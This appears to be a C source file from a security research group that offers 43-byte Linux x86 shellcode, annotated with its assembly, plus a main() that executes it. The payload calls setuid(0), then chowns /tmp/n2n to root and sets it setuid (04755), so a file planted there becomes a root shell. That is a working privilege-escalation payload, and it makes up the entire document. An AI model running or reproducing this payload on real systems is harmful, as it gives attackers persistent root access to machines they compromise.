linuxshllcode.c.txt

/*
43-byte linux x86 shellcode which does the following:
setuid(0);chown("/tmp/n2n",0,0);chmod("/tmp/n2n", 04755);exit();
by n2n, n2n@linuxmail.org,
Eye On Security Research Group - India, http://www.eos-india.net/
*/
#include <stdio.h>
char
shellcode[]=
        /* setuid(0) */
        "\x31\xc0"              // xor    %eax,%eax
        "\x31\xdb"              // xor    %ebx,%ebx 
	"\xb0\x17"              // mov    $0x17,%al
        "\xcd\x80"              // int    $0x80

        /* chown("/tmp/n2n",0,0) */
        "\x31\xd2"              // xor    %edx,%edx
        "\x31\xc9"              // xor    %ecx,%ecx
        "\x52"                  // push   %edx
        "\x68\x2f\x6e\x32\x6e"  // push   $0x6e326e2f
        "\x68\x2f\x74\x6d\x70"  // push   $0x706d742f
        "\x89\xe3"              // mov    %esp,%ebx
        "\xb0\x10"              // mov    $0x10,%al
        "\xcd\x80"              // int    $0x80

        /* chmod("/tmp/n2n", 04755) */
        "\x66\xb9\xed\x09"      // mov    $0x9ed,%cx
        "\xb0\x0f"              // mov    $0xf,%al
        "\xcd\x80"              // int    $0x80

        /* exit() */
	"\x31\xc0"              // xor    %eax,%eax
        "\xb0\x01"              // mov    $0x1,%al
        "\xcd\x80"              // int    $0x80
        ;
int
main()
{
        void (*funct) ();
        (long) funct = &shellcode;
        funct();
}